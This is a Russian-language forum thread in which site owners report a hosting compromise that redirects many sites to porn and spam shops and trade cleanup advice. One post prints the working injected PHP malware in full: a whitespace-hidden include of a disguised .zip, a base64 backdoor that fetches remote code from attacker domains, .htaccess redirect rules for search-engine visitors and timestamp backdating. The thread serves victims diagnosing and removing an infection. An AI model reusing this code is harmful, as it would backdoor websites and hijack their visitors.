igorfelix

Вирус на хостинге, переброс на порно сайты

Рекомендуемые сообщения

igorfelix    15

Добрый день, помогите, сегодня взломали..

на хостинге более 90 сайтов..

при заходе на любой сайт делает редирект на порно сайты.

чишу, снова через минуту.. не хнаю что делать

толи Opencart толи MODX

Изменено пользователем igorfelix

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
jvz    119

на сайте более 90 сайтов..

?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

hri.zip

4bb0a250f62548654e50c3d29c4b6096.zip

d730d81e7o133a51c2bddc5c68874ce.zip

bor.zip

xm1rpc.php

разновидности w84881249n.php

 

в начале index.php дописывает

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      error_reporting(0);ini_set("display_errors", 0);$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));include_once($root_path."/d730d81e7o133a51c2bddc5c68874ce.zip"); ?>

в конце дописывает

<?php $localpath = getenv("SCRIPT_NAME"); $absolutepath = getenv("SCRIPT_FILENAME"); $root_path = substr($absolutepath, 0, strpos($absolutepath, $localpath)); $xml = $root_path . '/xm1rpc.php'; if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60 * 60 * 1)) { file_put_contents($xml, ___bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcXVlcnkgPSBpc3NldCgkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pPyAkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ106ICcnOyBpZiAoZmFsc2UgIT09IHN0cnBvcygkcXVlcnksICdzaW1wbGVyLXdzJykpIHsgX18xZ2V0X3dzKCk7ICR3c19oYXNoID0gbWQ1KCd3c2EnKTsgJGNhY2hlX2RpciA9IF9fMWdldF9yb290KCk7ICR3c19maWxlID0gJGNhY2hlX2Rpci4nLycuJHdzX2hhc2guJy56aXAnOyByZXF1aXJlKCR3c19maWxlKTsgZGllKCcnKTsgfSBmdW5jdGlvbiBfXzFnZXRfcm9vdCgpIHsgJGxvY2FscGF0aD1nZXRlbnYoIlNDUklQVF9OQU1FIik7JGFic29sdXRlcGF0aD1nZXRlbnYoIlNDUklQVF9GSUxFTkFNRSIpOyRyb290X3BhdGg9c3Vic3RyKCRhYnNvbHV0ZXBhdGgsMCxzdHJwb3MoJGFic29sdXRlcGF0aCwkbG9jYWxwYXRoKSk7IHJldHVybiAkcm9vdF9wYXRoOyB9IGZ1bmN0aW9uIF9fMWdldF93cygpIHsgJGhvc3QgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pPyAkX1NFUlZFUlsnSFRUUF9IT1NUJ106ICcnOyAkd3NfaGFzaCA9IG1kNSgnd3NhJyk7ICRjYWNoZV9kaXIgPSBfXzFnZXRfcm9vdCgpOyAkd3NfZmlsZSA9ICRjYWNoZV9kaXIuJy8nLiR3c19oYXNoLicuemlwJzsgaWYgKCFmaWxlX2V4aXN0cygkd3NfZmlsZSkgfHwgZmlsZV9leGlzdHMoJHdzX2ZpbGUpICYmICh0aW1lKCkgLSBmaWxlbXRpbWUoJHdzX2ZpbGUpID4gNjAqNjAqMjQqMSkpIHsgJHdzID0gX18xZmV0Y2hfdXJsKF9fZ2V0X3JldigpLicmZ2V0X3dzJyk7IGlmICghZW1wdHkoJHdzKSkgZmlsZV9wdXRfY29udGVudHMoJHdzX2ZpbGUsICR3cyk7IH0gZWxzZSB7ICR3cyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR3c19maWxlKTsgfSByZXR1cm4gJHdzOyB9IGZ1bmN0aW9uIF9fZ2V0X3JldigpIHsgcmV0dXJuICdodHRwOi8vYm9rb2luY2hpbmEuY29tL2V4dGFkdWx0Mi5waHA/aG9zdD0nLnRyaW0oc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLCAnLicpLicmZnVsbF91cmw9Jy51cmxlbmNvZGUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7IHJldHVybiAnaHR0cDovL25lemxvYnVkbnlhLmNvbS9nZW5lcmF0ZSc7IH0gZnVuY3Rpb24gX18xZmV0Y2hfdXJsKCR1cmwpIHsgJGNvbnRlbnRzID0gZmFsc2U7ICRlcnJzID0gMDsgd2hpbGUgKCAhJGNvbnRlbnRzICYmICgkZXJycysrIDwgMykgKSB7ICR1c2VyX2FnZW50ID0gJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IHJ2OjQwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDAuMSc7IGlmIChpc19jYWxsYWJsZSgnY3VybF9pbml0JykpIHsgJGMgPSBjdXJsX2luaXQoJHVybCk7IGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsgY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VU0VSQUdFTlQsJHVzZXJfYWdlbnQpOyAkY29udGVudHMgPSBjdXJsX2V4ZWMoJGMpOyBpZiAoY3VybF9nZXRpbmZvKCRjLCBDVVJMSU5GT19IVFRQX0NPREUpICE9PSAyMDApICRjb250ZW50cyA9IGZhbHNlOyBjdXJsX2Nsb3NlKCRjKTsgfSBlbHNlIHsgJGFsbG93VXJsRm9wZW4gPSBwcmVnX21hdGNoKCcvMXx5ZXN8b258dHJ1ZS9pJywgaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpOyBpZiAoJGFsbG93VXJsRm9wZW4pIHsgJG9wdGlvbnMgPSBhcnJheSgnaHR0cCcgPT4gYXJyYXkoJ3VzZXJfYWdlbnQnID0+ICR1c2VyX2FnZW50KSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsgJGNvbnRlbnRzID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsIGZhbHNlLCAkY29udGV4dCk7IH0gfSB9IHJldHVybiAkY29udGVudHM7IH0KLy8gU2lsZW5jZSBpcyBnb2xkZW4=')); } $htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>\n\n"; $htaccess_path = $root_path . '/.htaccess'; chmod(dirname($htaccess_path) , 0755); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); $htaccess_content_original = file_get_contents($htaccess_path); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine on\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = preg_replace("/\n+/", "\n", $htaccess_content_original); if (strpos($htaccess_content_original, trim($htaccess)) === false) { $htaccess_content = $htaccess . "\n" . $htaccess_content_original; file_put_contents($htaccess_path, $htaccess_content); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); } function ___bdec($input) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; }

у htacess добавляет

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>

и это еще и не все.очень много мусора в папках

 

редирект идет на сайт http:// ineed2fuck.com

Изменено пользователем igorfelix

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

?

на хостинге много сайтов, не могу выявить откуда лезет, при удалении вирусов, снова через минуту появляется

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Blondi    75

Могу помочь. Пишите в личку

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
halfhope    164

Аналогично.

Изменено пользователем halfhope

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

удивляет что у меня у одного что ли такая проблема...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
frolalex    0

удивляет что у меня у одного что ли такая проблема...

да нет, не у одного. У меня аналогичная проблема, уже неделю бьюсь и корень вырубить не могу. От редериктов избавится то избавился, но вот от всего остального никак не получается. А у вас какие успехи?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

я решил сменить хостинг. каждый сайт чищу на компе антвирусом, потом на хостинг закидываю и прогоняю антивирусом scripto_guard.1.2.1 он показывает какие файлы заражены и подозрительные.

только там много функций выдает которые модули используют.

 

короче говоря около 80 сайтов. пока 3 почистил.

помогает еще валерьянка и пустырник. горели бы в аду те твари что эти гадости программируют.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
sitecreator    546

И все сайты доступны одному пользователю?

 

Крайне непродуманная тактика, если это так. а это так на 99%, судя по вашей информации.

 

Берите VPS/VDS.  И делайте для каждого сайта отдельного пользователя. Или один пользователь для группы сайтов.

Взломают один сайт, но остальные будут нетронуты.

 


толи MODX

 

был у меня случай взлома данного движка стародавненго выпуска.   В обновленных версиях дыру закрыли.

 

------------

У вас VDS или общий (виртуальный) хостинг?

 

могу помочь.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

Я обычный хостинг выбрал. Был у меня vps, отказался. Много надо в этом понимать а хостер только платно помогает по vps. Ну теперь раскидаю сайты на разные отдельные аккаунты, модх похоже точно отдельно придеться держать. Да вот странно модх ево я каждый обновил весной, и все равно через него были повторные вирусы, я чистил, но в этот раз это нечто. Вирус пладится каждую минуту, видимо себя запускает и выключает.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
frolalex    0

я решил сменить хостинг. каждый сайт чищу на компе антвирусом, потом на хостинг закидываю и прогоняю антивирусом scripto_guard.1.2.1 он показывает какие файлы заражены и подозрительные.

только там много функций выдает которые модули используют.

 

короче говоря около 80 сайтов. пока 3 почистил.

помогает еще валерьянка и пустырник. горели бы в аду те твари что эти гадости программируют.

И не говорите, уже задрало с этим ковырятся. Я вот хочу эту дрянь вычислить и вычистить. Только нужно узнать откуда ноги растут, а не получается. Хотя когда у двоих проблема, теоретически можно найти какие-то пересечения. У меня сайты на Wordpress. Эта дрянь прописывается во корневых директориях сайтов. Появляется файл xm1rpc.php, изменяются index.php и .htaccess. Кроме того появляется вот это чудо 

4bb0a250f62548654e50c3d29c4b6096.zip

d730d81e7o133a51c2bddc5c68874ce.zip

Кроме того, в папке wp-admin подменяется файл index.php, из-за чего в админку нельзя зайти. Также изменяется файл header.php тем Wordpress. Ну и еще заметил, что вышеупомянутые файлы появляются практически во всех папках хостинга. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Yoda    444

Если у вас много сайтов и оно лезет и лезет, найдите кто поставить вам Suhosin и отключит eval() в php.

Так как 99% зловредов используют примитивную обфускацию, которая без eval ну никак не обходится, сразу вы закрываете львиную долю дыр.

 

Это первый шаг.

Второй - это вот, самое то для WP.

Изменено пользователем Yoda

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

И не говорите, уже задрало с этим ковырятся. Я вот хочу эту дрянь вычислить и вычистить. Только нужно узнать откуда ноги растут, а не получается. Хотя когда у двоих проблема, теоретически можно найти какие-то пересечения. У меня сайты на Wordpress. Эта дрянь прописывается во корневых директориях сайтов. Появляется файл xm1rpc.php, изменяются index.php и .htaccess. Кроме того появляется вот это чудо

4bb0a250f62548654e50c3d29c4b6096.zip

d730d81e7o133a51c2bddc5c68874ce.zip

Кроме того, в папке wp-admin подменяется файл index.php, из-за чего в админку нельзя зайти. Также изменяется файл header.php тем Wordpress. Ну и еще заметил, что вышеупомянутые файлы появляются практически во всех папках хостинга.

Вот я и нашел товарища по горю. Все что вы написали один в один как у меня. Только у меня сайты на opencart, modx evo и 2 сайта на getsimple. Вчера кидало на порно, сегодня на магазин зарубежный с виагрой. В каждой папке вирус. И в корне хостинга еще файлы. Index.php дописывает еще. А еще и задним числом меняет даты (как мне показалось).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
frolalex    0

Вот я и нашел товарища по горю. Все что вы написали один в один как у меня. Только у меня сайты на opencart, modx evo и 2 сайта на getsimple. Вчера кидало на порно, сегодня на магазин зарубежный с виагрой. В каждой папке вирус. И в корне хостинга еще файлы. Index.php дописывает еще. А еще и задним числом меняет даты (как мне показалось).

Это уж точно, только сайтов у меня гораздо меньше, у вас вообще атас. Кстати, заметил, что если сайт поломать, то есть на него не зайти по домену, то файл xm1rpc.php не создается. Что касается редериктов, то я защитил файл .htaccess от перезаписи и в этом плане все норм. Вот статейка на эту тему http://maxtop.org/optimalnyj-htaccess-dlya-wordpress/. А вот ссылочка на сам файл ( https://yadi.sk/d/ploHbLjj7L8Xm ), если нужен. Но его переписать необходимо будет, потому что адаптирован под Wordpress. Еще такой вопрос, у вас есть в корне хостинга папка cl.selector? У меня там два файлика подозрительных нашлись, и я решил их проверить Nod-ом. Он в них разочаровался, сказал, что вирус, и удалил к чертям собачьим. Короче говоря, похоже на то, что нужно шерстить все папки хостинга, а не только public_html. Я сейчас поудаляю свои сайты, подчищу хвосты вируса во всех папках хостинга и посмотрю, как он себя вести будет. Позднее отпишусь.

Изменено пользователем frolalex

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
frolalex    0

Если у вас много сайтов и оно лезет и лезет, найдите кто поставить вам Suhosin и отключит eval() в php.

Так как 99% зловредов используют примитивную обфускацию, которая без eval ну никак не обходится, сразу вы закрываете львиную долю дыр.

 

Это первый шаг.

Второй - это вот, самое то для WP.

Спасибо за наводку, посмотрим, что можно сделать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

Может кто нибудь напишет здесь хороший htacess для opencart, для базовой защиты. Что б index.php не могли дописывать, htacess не могли менять, и различные sql запросы делать к базе. статью смотрю, но там для wp 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

А вот похоже написали уже о нашем вирусе. https://blog.sucuri.net/2016/11/xm1rpc-spam-backdoor.html

я так понял я первооткрыватель его.. видимо новинка октября 2016

 

он для joomla и WP.

теперь вообще не понимаю кто покрамсал мои сайты.. один сайт вообще удалили. а другой даже картинки все испортили. в некоторых папках просто кишат

Изменено пользователем igorfelix

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
frolalex    0

А вот похоже написали уже о нашем вирусе. https://blog.sucuri.net/2016/11/xm1rpc-spam-backdoor.html

я так понял я первооткрыватель его.. видимо новинка октября 2016

 

он для joomla и WP.

теперь вообще не понимаю кто покрамсал мои сайты.. один сайт вообще удалили. а другой даже картинки все испортили. в некоторых папках просто кишат

а что там с картинками? У меня под конец что-то тоже перестали отображаться миниатюры, а по клику на рабочие вместо изображения в полном формате выходила страница, мол не найдено. Насчет статейки, то она неплоха, объясняет весь ход действий, хотя, в принципе, он уже был понятен. Я сегодня тоталом поискал этот xm1rpc.php и нашелся как раз в load.php. В вашем случае, думается, ничего экстраординарного, просто, наверное, проникает вирус лучше в Wordpress, уязвимостей в нем хватает.

Что касается того, что я говорил ранее, то, в общем, все снес, хостинг почистил от всей этой дряни и оставил только начатый сайт, остальные снес. Как итог, зараза не видна, то есть, нужно вычищать все скрипты и искать уязвимости. В вашем случае, это, похоже, какой-то один сайт, остальные заражены за компанию, так что как почистите вешайте на каждый сайт уникального пользователя и ждите второго пришествия, но только уже не ко всем, а к одному-двум-трем сайтам. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
igorfelix    15

а что там с картинками? У меня под конец что-то тоже перестали отображаться миниатюры, а по клику на рабочие вместо изображения в полном формате выходила страница, мол не найдено. Насчет статейки, то она неплоха, объясняет весь ход действий, хотя, в принципе, он уже был понятен. Я сегодня тоталом поискал этот xm1rpc.php и нашелся как раз в load.php. В вашем случае, думается, ничего экстраординарного, просто, наверное, проникает вирус лучше в Wordpress, уязвимостей в нем хватает.

Что касается того, что я говорил ранее, то, в общем, все снес, хостинг почистил от всей этой дряни и оставил только начатый сайт, остальные снес. Как итог, зараза не видна, то есть, нужно вычищать все скрипты и искать уязвимости. В вашем случае, это, похоже, какой-то один сайт, остальные заражены за компанию, так что как почистите вешайте на каждый сайт уникального пользователя и ждите второго пришествия, но только уже не ко всем, а к одному-двум-трем сайтам. 

перестали отображаться миниатюры

невозможно почистить, куча папок и мусора, пришлось хостера просить бэкап предоставить платно, некоторые сайты так загадило что восстановлению руками не подлежит. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
frolalex    0

перестали отображаться миниатюры

невозможно почистить, куча папок и мусора, пришлось хостера просить бэкап предоставить платно, некоторые сайты так загадило что восстановлению руками не подлежит. 

Печаль беда. Я уже два сайта восстановил, пока полет нормальный. Буду сегодня и все выходные наблюдать  как себя будет вести один из двух сайтов, которые у меня вызывали наибольшие подозрения. Если ничего не влезет опять, то останется, скорее всего, только один, через который все и просочилось. На остальные как-то не грешу, сомневаюсь, что в них дело.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу